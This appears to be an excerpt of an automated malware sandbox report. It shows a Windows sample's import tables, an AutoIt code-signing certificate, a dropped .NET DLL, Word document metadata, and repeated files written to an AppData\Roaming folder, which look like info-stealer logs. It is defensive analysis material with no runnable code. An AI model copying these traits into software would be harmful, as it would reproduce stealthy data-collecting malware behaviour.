CloseWindowStation | 0x0 | 0x4906a0 | 0xbd8e8 | 0xbc4e8 | 0x4e |
OpenDesktopW | 0x0 | 0x4906a4 | 0xbd8ec | 0xbc4ec | 0x228 |
SetProcessWindowStation | 0x0 | 0x4906a8 | 0xbd8f0 | 0xbc4f0 | 0x2aa |
GetProcessWindowStation | 0x0 | 0x4906ac | 0xbd8f4 | 0xbc4f4 | 0x168 |
OpenWindowStationW | 0x0 | 0x4906b0 | 0xbd8f8 | 0xbc4f8 | 0x22d |
GetUserObjectSecurity | 0x0 | 0x4906b4 | 0xbd8fc | 0xbc4fc | 0x18c |
MessageBoxW | 0x0 | 0x4906b8 | 0xbd900 | 0xbc500 | 0x215 |
DefWindowProcW | 0x0 | 0x4906bc | 0xbd904 | 0xbc504 | 0x9c |
SetClipboardData | 0x0 | 0x4906c0 | 0xbd908 | 0xbc508 | 0x286 |
EmptyClipboard | 0x0 | 0x4906c4 | 0xbd90c | 0xbc50c | 0xd5 |
CountClipboardFormats | 0x0 | 0x4906c8 | 0xbd910 | 0xbc510 | 0x56 |
CloseClipboard | 0x0 | 0x4906cc | 0xbd914 | 0xbc514 | 0x49 |
GetClipboardData | 0x0 | 0x4906d0 | 0xbd918 | 0xbc518 | 0x116 |
IsClipboardFormatAvailable | 0x0 | 0x4906d4 | 0xbd91c | 0xbc51c | 0x1ca |
OpenClipboard | 0x0 | 0x4906d8 | 0xbd920 | 0xbc520 | 0x226 |
BlockInput | 0x0 | 0x4906dc | 0xbd924 | 0xbc524 | 0xf |
GetMessageW | 0x0 | 0x4906e0 | 0xbd928 | 0xbc528 | 0x15d |
LockWindowUpdate | 0x0 | 0x4906e4 | 0xbd92c | 0xbc52c | 0x1fd |
DispatchMessageW | 0x0 | 0x4906e8 | 0xbd930 | 0xbc530 | 0xaf |
TranslateMessage | 0x0 | 0x4906ec | 0xbd934 | 0xbc534 | 0x2fc |
PeekMessageW | 0x0 | 0x4906f0 | 0xbd938 | 0xbc538 | 0x233 |
UnregisterHotKey | 0x0 | 0x4906f4 | 0xbd93c | 0xbc53c | 0x308 |
CheckMenuRadioItem | 0x0 | 0x4906f8 | 0xbd940 | 0xbc540 | 0x40 |
CharLowerBuffW | 0x0 | 0x4906fc | 0xbd944 | 0xbc544 | 0x2d |
MoveWindow | 0x0 | 0x490700 | 0xbd948 | 0xbc548 | 0x21b |
SetFocus | 0x0 | 0x490704 | 0xbd94c | 0xbc54c | 0x292 |
PostQuitMessage | 0x0 | 0x490708 | 0xbd950 | 0xbc550 | 0x237 |
KillTimer | 0x0 | 0x49070c | 0xbd954 | 0xbc554 | 0x1e3 |
CreatePopupMenu | 0x0 | 0x490710 | 0xbd958 | 0xbc558 | 0x6b |
RegisterWindowMessageW | 0x0 | 0x490714 | 0xbd95c | 0xbc55c | 0x263 |
SetTimer | 0x0 | 0x490718 | 0xbd960 | 0xbc560 | 0x2bb |
ShowWindow | 0x0 | 0x49071c | 0xbd964 | 0xbc564 | 0x2df |
CreateWindowExW | 0x0 | 0x490720 | 0xbd968 | 0xbc568 | 0x6e |
RegisterClassExW | 0x0 | 0x490724 | 0xbd96c | 0xbc56c | 0x24d |
LoadIconW | 0x0 | 0x490728 | 0xbd970 | 0xbc570 | 0x1ed |
LoadCursorW | 0x0 | 0x49072c | 0xbd974 | 0xbc574 | 0x1eb |
GetSysColorBrush | 0x0 | 0x490730 | 0xbd978 | 0xbc578 | 0x17c |
GetForegroundWindow | 0x0 | 0x490734 | 0xbd97c | 0xbc57c | 0x12d |
MessageBoxA | 0x0 | 0x490738 | 0xbd980 | 0xbc580 | 0x20e |
DestroyIcon | 0x0 | 0x49073c | 0xbd984 | 0xbc584 | 0xa3 |
SystemParametersInfoW | 0x0 | 0x490740 | 0xbd988 | 0xbc588 | 0x2ec |
LoadImageW | 0x0 | 0x490744 | 0xbd98c | 0xbc58c | 0x1ef |
GetClassNameW | 0x0 | 0x490748 | 0xbd990 | 0xbc590 | 0x112 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
StrokePath | 0x0 | 0x4900c4 | 0xbd30c | 0xbbf0c | 0x2b6 |
DeleteObject | 0x0 | 0x4900c8 | 0xbd310 | 0xbbf10 | 0xe6 |
GetTextExtentPoint32W | 0x0 | 0x4900cc | 0xbd314 | 0xbbf14 | 0x21e |
ExtCreatePen | 0x0 | 0x4900d0 | 0xbd318 | 0xbbf18 | 0x132 |
GetDeviceCaps | 0x0 | 0x4900d4 | 0xbd31c | 0xbbf1c | 0x1cb |
EndPath | 0x0 | 0x4900d8 | 0xbd320 | 0xbbf20 | 0xf3 |
SetPixel | 0x0 | 0x4900dc | 0xbd324 | 0xbbf24 | 0x29b |
CloseFigure | 0x0 | 0x4900e0 | 0xbd328 | 0xbbf28 | 0x1e |
CreateCompatibleBitmap | 0x0 | 0x4900e4 | 0xbd32c | 0xbbf2c | 0x2f |
CreateCompatibleDC | 0x0 | 0x4900e8 | 0xbd330 | 0xbbf30 | 0x30 |
SelectObject | 0x0 | 0x4900ec | 0xbd334 | 0xbbf34 | 0x277 |
StretchBlt | 0x0 | 0x4900f0 | 0xbd338 | 0xbbf38 | 0x2b3 |
GetDIBits | 0x0 | 0x4900f4 | 0xbd33c | 0xbbf3c | 0x1ca |
LineTo | 0x0 | 0x4900f8 | 0xbd340 | 0xbbf40 | 0x236 |
AngleArc | 0x0 | 0x4900fc | 0xbd344 | 0xbbf44 | 0x8 |
MoveToEx | 0x0 | 0x490100 | 0xbd348 | 0xbbf48 | 0x23a |
Ellipse | 0x0 | 0x490104 | 0xbd34c | 0xbbf4c | 0xed |
DeleteDC | 0x0 | 0x490108 | 0xbd350 | 0xbbf50 | 0xe3 |
GetPixel | 0x0 | 0x49010c | 0xbd354 | 0xbbf54 | 0x204 |
CreateDCW | 0x0 | 0x490110 | 0xbd358 | 0xbbf58 | 0x32 |
GetStockObject | 0x0 | 0x490114 | 0xbd35c | 0xbbf5c | 0x20d |
GetTextFaceW | 0x0 | 0x490118 | 0xbd360 | 0xbbf60 | 0x224 |
CreateFontW | 0x0 | 0x49011c | 0xbd364 | 0xbbf64 | 0x41 |
SetTextColor | 0x0 | 0x490120 | 0xbd368 | 0xbbf68 | 0x2a6 |
PolyDraw | 0x0 | 0x490124 | 0xbd36c | 0xbbf6c | 0x250 |
BeginPath | 0x0 | 0x490128 | 0xbd370 | 0xbbf70 | 0x12 |
Rectangle | 0x0 | 0x49012c | 0xbd374 | 0xbbf74 | 0x25f |
SetViewportOrgEx | 0x0 | 0x490130 | 0xbd378 | 0xbbf78 | 0x2a9 |
GetObjectW | 0x0 | 0x490134 | 0xbd37c | 0xbbf7c | 0x1fd |
SetBkMode | 0x0 | 0x490138 | 0xbd380 | 0xbbf80 | 0x27f |
RoundRect | 0x0 | 0x49013c | 0xbd384 | 0xbbf84 | 0x26a |
SetBkColor | 0x0 | 0x490140 | 0xbd388 | 0xbbf88 | 0x27e |
CreatePen | 0x0 | 0x490144 | 0xbd38c | 0xbbf8c | 0x4b |
CreateSolidBrush | 0x0 | 0x490148 | 0xbd390 | 0xbbf90 | 0x54 |
StrokeAndFillPath | 0x0 | 0x49014c | 0xbd394 | 0xbbf94 | 0x2b5 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetOpenFileNameW | 0x0 | 0x4900b8 | 0xbd300 | 0xbbf00 | 0xc |
GetSaveFileNameW | 0x0 | 0x4900bc | 0xbd304 | 0xbbf04 | 0xe |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetAce | 0x0 | 0x490000 | 0xbd248 | 0xbbe48 | 0x123 |
RegEnumValueW | 0x0 | 0x490004 | 0xbd24c | 0xbbe4c | 0x252 |
RegDeleteValueW | 0x0 | 0x490008 | 0xbd250 | 0xbbe50 | 0x248 |
RegDeleteKeyW | 0x0 | 0x49000c | 0xbd254 | 0xbbe54 | 0x244 |
RegEnumKeyExW | 0x0 | 0x490010 | 0xbd258 | 0xbbe58 | 0x24f |
RegSetValueExW | 0x0 | 0x490014 | 0xbd25c | 0xbbe5c | 0x27e |
RegOpenKeyExW | 0x0 | 0x490018 | 0xbd260 | 0xbbe60 | 0x261 |
RegCloseKey | 0x0 | 0x49001c | 0xbd264 | 0xbbe64 | 0x230 |
RegQueryValueExW | 0x0 | 0x490020 | 0xbd268 | 0xbbe68 | 0x26e |
RegConnectRegistryW | 0x0 | 0x490024 | 0xbd26c | 0xbbe6c | 0x234 |
InitializeSecurityDescriptor | 0x0 | 0x490028 | 0xbd270 | 0xbbe70 | 0x177 |
InitializeAcl | 0x0 | 0x49002c | 0xbd274 | 0xbbe74 | 0x176 |
AdjustTokenPrivileges | 0x0 | 0x490030 | 0xbd278 | 0xbbe78 | 0x1f |
OpenThreadToken | 0x0 | 0x490034 | 0xbd27c | 0xbbe7c | 0x1fc |
OpenProcessToken | 0x0 | 0x490038 | 0xbd280 | 0xbbe80 | 0x1f7 |
LookupPrivilegeValueW | 0x0 | 0x49003c | 0xbd284 | 0xbbe84 | 0x197 |
DuplicateTokenEx | 0x0 | 0x490040 | 0xbd288 | 0xbbe88 | 0xdf |
CreateProcessAsUserW | 0x0 | 0x490044 | 0xbd28c | 0xbbe8c | 0x7c |
CreateProcessWithLogonW | 0x0 | 0x490048 | 0xbd290 | 0xbbe90 | 0x7d |
GetLengthSid | 0x0 | 0x49004c | 0xbd294 | 0xbbe94 | 0x136 |
CopySid | 0x0 | 0x490050 | 0xbd298 | 0xbbe98 | 0x76 |
LogonUserW | 0x0 | 0x490054 | 0xbd29c | 0xbbe9c | 0x18d |
AllocateAndInitializeSid | 0x0 | 0x490058 | 0xbd2a0 | 0xbbea0 | 0x20 |
CheckTokenMembership | 0x0 | 0x49005c | 0xbd2a4 | 0xbbea4 | 0x51 |
RegCreateKeyExW | 0x0 | 0x490060 | 0xbd2a8 | 0xbbea8 | 0x239 |
FreeSid | 0x0 | 0x490064 | 0xbd2ac | 0xbbeac | 0x120 |
GetTokenInformation | 0x0 | 0x490068 | 0xbd2b0 | 0xbbeb0 | 0x15a |
GetSecurityDescriptorDacl | 0x0 | 0x49006c | 0xbd2b4 | 0xbbeb4 | 0x148 |
GetAclInformation | 0x0 | 0x490070 | 0xbd2b8 | 0xbbeb8 | 0x124 |
AddAce | 0x0 | 0x490074 | 0xbd2bc | 0xbbebc | 0x16 |
SetSecurityDescriptorDacl | 0x0 | 0x490078 | 0xbd2c0 | 0xbbec0 | 0x2b6 |
GetUserNameW | 0x0 | 0x49007c | 0xbd2c4 | 0xbbec4 | 0x165 |
InitiateSystemShutdownExW | 0x0 | 0x490080 | 0xbd2c8 | 0xbbec8 | 0x17d |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
DragQueryPoint | 0x0 | 0x49048c | 0xbd6d4 | 0xbc2d4 | 0x20 |
ShellExecuteExW | 0x0 | 0x490490 | 0xbd6d8 | 0xbc2d8 | 0x121 |
DragQueryFileW | 0x0 | 0x490494 | 0xbd6dc | 0xbc2dc | 0x1f |
SHEmptyRecycleBinW | 0x0 | 0x490498 | 0xbd6e0 | 0xbc2e0 | 0xa5 |
SHGetPathFromIDListW | 0x0 | 0x49049c | 0xbd6e4 | 0xbc2e4 | 0xd7 |
SHBrowseForFolderW | 0x0 | 0x4904a0 | 0xbd6e8 | 0xbc2e8 | 0x7b |
SHCreateShellItem | 0x0 | 0x4904a4 | 0xbd6ec | 0xbc2ec | 0x9a |
SHGetDesktopFolder | 0x0 | 0x4904a8 | 0xbd6f0 | 0xbc2f0 | 0xb6 |
SHGetSpecialFolderLocation | 0x0 | 0x4904ac | 0xbd6f4 | 0xbc2f4 | 0xdf |
SHGetFolderPathW | 0x0 | 0x4904b0 | 0xbd6f8 | 0xbc2f8 | 0xc3 |
SHFileOperationW | 0x0 | 0x4904b4 | 0xbd6fc | 0xbc2fc | 0xac |
ExtractIconExW | 0x0 | 0x4904b8 | 0xbd700 | 0xbc300 | 0x2a |
Shell_NotifyIconW | 0x0 | 0x4904bc | 0xbd704 | 0xbc304 | 0x12e |
ShellExecuteW | 0x0 | 0x4904c0 | 0xbd708 | 0xbc308 | 0x122 |
DragFinish | 0x0 | 0x4904c4 | 0xbd70c | 0xbc30c | 0x1b |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CoTaskMemAlloc | 0x0 | 0x490828 | 0xbda70 | 0xbc670 | 0x67 |
CoTaskMemFree | 0x0 | 0x49082c | 0xbda74 | 0xbc674 | 0x68 |
CLSIDFromString | 0x0 | 0x490830 | 0xbda78 | 0xbc678 | 0x8 |
ProgIDFromCLSID | 0x0 | 0x490834 | 0xbda7c | 0xbc67c | 0x14b |
CLSIDFromProgID | 0x0 | 0x490838 | 0xbda80 | 0xbc680 | 0x6 |
OleSetMenuDescriptor | 0x0 | 0x49083c | 0xbda84 | 0xbc684 | 0x147 |
MkParseDisplayName | 0x0 | 0x490840 | 0xbda88 | 0xbc688 | 0xd4 |
OleSetContainedObject | 0x0 | 0x490844 | 0xbda8c | 0xbc68c | 0x146 |
StringFromGUID2 | 0x0 | 0x490848 | 0xbda90 | 0xbc690 | 0x179 |
CreateStreamOnHGlobal | 0x0 | 0x49084c | 0xbda94 | 0xbc694 | 0x86 |
OleInitialize | 0x0 | 0x490850 | 0xbda98 | 0xbc698 | 0x132 |
OleUninitialize | 0x0 | 0x490854 | 0xbda9c | 0xbc69c | 0x149 |
CoInitialize | 0x0 | 0x490858 | 0xbdaa0 | 0xbc6a0 | 0x3e |
CoCreateInstance | 0x0 | 0x49085c | 0xbdaa4 | 0xbc6a4 | 0x10 |
CoUninitialize | 0x0 | 0x490860 | 0xbdaa8 | 0xbc6a8 | 0x6c |
GetRunningObjectTable | 0x0 | 0x490864 | 0xbdaac | 0xbc6ac | 0x97 |
CoGetInstanceFromFile | 0x0 | 0x490868 | 0xbdab0 | 0xbc6b0 | 0x2d |
CoGetObject | 0x0 | 0x49086c | 0xbdab4 | 0xbc6b4 | 0x35 |
CoInitializeSecurity | 0x0 | 0x490870 | 0xbdab8 | 0xbc6b8 | 0x40 |
IIDFromString | 0x0 | 0x490874 | 0xbdabc | 0xbc6bc | 0xcd |
CoSetProxyBlanket | 0x0 | 0x490878 | 0xbdac0 | 0xbc6c0 | 0x63 |
CoCreateInstanceEx | 0x0 | 0x49087c | 0xbdac4 | 0xbc6c4 | 0x11 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CreateDispTypeInfo | 0x1f | 0x49040c | 0xbd654 | 0xbc254 | - |
VariantCopyInd | 0xb | 0x490410 | 0xbd658 | 0xbc258 | - |
SysReAllocString | 0x3 | 0x490414 | 0xbd65c | 0xbc25c | - |
SysFreeString | 0x6 | 0x490418 | 0xbd660 | 0xbc260 | - |
SafeArrayDestroyDescriptor | 0x26 | 0x49041c | 0xbd664 | 0xbc264 | - |
SafeArrayDestroyData | 0x27 | 0x490420 | 0xbd668 | 0xbc268 | - |
SafeArrayUnaccessData | 0x18 | 0x490424 | 0xbd66c | 0xbc26c | - |
SafeArrayAccessData | 0x17 | 0x490428 | 0xbd670 | 0xbc270 | - |
SafeArrayAllocData | 0x25 | 0x49042c | 0xbd674 | 0xbc274 | - |
SafeArrayAllocDescriptorEx | 0x29 | 0x490430 | 0xbd678 | 0xbc278 | - |
SafeArrayCreateVector | 0x19b | 0x490434 | 0xbd67c | 0xbc27c | - |
CreateStdDispatch | 0x20 | 0x490438 | 0xbd680 | 0xbc280 | - |
VarR8FromDec | 0xdc | 0x49043c | 0xbd684 | 0xbc284 | - |
SafeArrayGetVartype | 0x4d | 0x490440 | 0xbd688 | 0xbc288 | - |
OleLoadPicture | 0x1a2 | 0x490444 | 0xbd68c | 0xbc28c | - |
QueryPathOfRegTypeLib | 0xa4 | 0x490448 | 0xbd690 | 0xbc290 | - |
LoadTypeLibEx | 0xb7 | 0x49044c | 0xbd694 | 0xbc294 | - |
RegisterTypeLib | 0xa3 | 0x490450 | 0xbd698 | 0xbc298 | - |
RegisterTypeLibForUser | 0x1ba | 0x490454 | 0xbd69c | 0xbc29c | - |
VariantCopy | 0xa | 0x490458 | 0xbd6a0 | 0xbc2a0 | - |
VariantClear | 0x9 | 0x49045c | 0xbd6a4 | 0xbc2a4 | - |
UnRegisterTypeLibForUser | 0x1bb | 0x490460 | 0xbd6a8 | 0xbc2a8 | - |
UnRegisterTypeLib | 0xba | 0x490464 | 0xbd6ac | 0xbc2ac | - |
DispCallFunc | 0x92 | 0x490468 | 0xbd6b0 | 0xbc2b0 | - |
VariantChangeType | 0xc | 0x49046c | 0xbd6b4 | 0xbc2b4 | - |
SysStringLen | 0x7 | 0x490470 | 0xbd6b8 | 0xbc2b8 | - |
VariantTimeToSystemTime | 0xb9 | 0x490474 | 0xbd6bc | 0xbc2bc | - |
SysAllocString | 0x2 | 0x490478 | 0xbd6c0 | 0xbc2c0 | - |
VariantInit | 0x8 | 0x49047c | 0xbd6c4 | 0xbc2c4 | - |
Issued by | AutoIt Consulting Ltd |
Parent Certificate | GlobalSign CodeSigning CA - SHA256 - G3 |
Country Name | GB |
Valid From | 2018-01-24 09:39:13+00:00 |
Valid Until | 2020-07-04 06:50:17+00:00 |
Algorithm | sha256_rsa |
Serial Number | 42 F7 CE C0 08 6A C8 87 BB 81 BA 16 |
Thumbprint | 6D A9 2F 8A 43 63 0D E4 66 A2 1B B8 2A F0 5B 5A 0D 5A 33 97 |
Issued by | GlobalSign CodeSigning CA - SHA256 - G3 |
Country Name | BE |
Valid From | 2016-06-15 00:00:00+00:00 |
Valid Until | 2024-06-15 00:00:00+00:00 |
Algorithm | sha256_rsa |
Serial Number | 48 1B 6A 07 26 D2 E8 3F 26 02 D4 82 5A CD |
Thumbprint | 09 0D 03 43 5E B2 A8 36 4F 79 B7 8C B1 73 D3 5E 8E B6 35 58 |
C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.tmp | Created File | Unknown |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | Created File | Binary |
Not Queried
Image Base | 0x400000 |
Entry Point | 0x402a0e |
Size Of Code | 0xc00 |
Size Of Initialized Data | 0x600 |
File Type | dll |
Subsystem | windows_cui |
Machine Type | i386 |
Compile Timestamp | 2019-02-11 09:18:18+00:00 |
Assembly Version | 0.0.0.0 |
LegalCopyright | |
InternalName | atsamxnv.dll |
FileVersion | 0.0.0.0 |
ProductVersion | 0.0.0.0 |
FileDescription | |
OriginalFilename | atsamxnv.dll |
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x402000 | 0xa14 | 0xc00 | 0x200 | cnt_code, mem_execute, mem_read | 4.68 |
.rsrc | 0x404000 | 0x2a8 | 0x400 | 0xe00 | cnt_initialized_data, mem_read | 2.17 |
.reloc | 0x406000 | 0xc | 0x200 | 0x1200 | cnt_initialized_data, mem_discardable, mem_read | 0.08 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
_CorDllMain | 0x0 | 0x402000 | 0x29e4 | 0xbe4 | 0x0 |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.word\~$ro0000.doc | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logim.jpeg | Created File | Image |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrv.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.word\~wro0000.doc | Created File | Word Document |
Not Queried
Revision | 1 |
Create Time | 2019-02-11 04:16:00+00:00 |
Application | Microsoft Office Word |
App Version | 16.0000 |
Template | Normal.dotm |
Document Security | SecurityFlag.NONE |
Page Count | 1 |
ScaleCrop | |
SharedDoc |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.out | Created File | Text |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.0.cs | Created File | Text |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logri.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
b725d5476e76f555fc24ecb908474fd29b671687336e5e1177a5c4c35cb5939f | Embedded File | XML |
Not Queried
f6dd369a94b5de69ef36f791f233114a80259b3e4e56c5a5356242b050e86550 | Embedded File | XML |
Not Queried
bd2cb39c79a30d6942015dd24ea7ca012018a010cbd40eb98994354b3b892b2a | Embedded File | XML |
Not Queried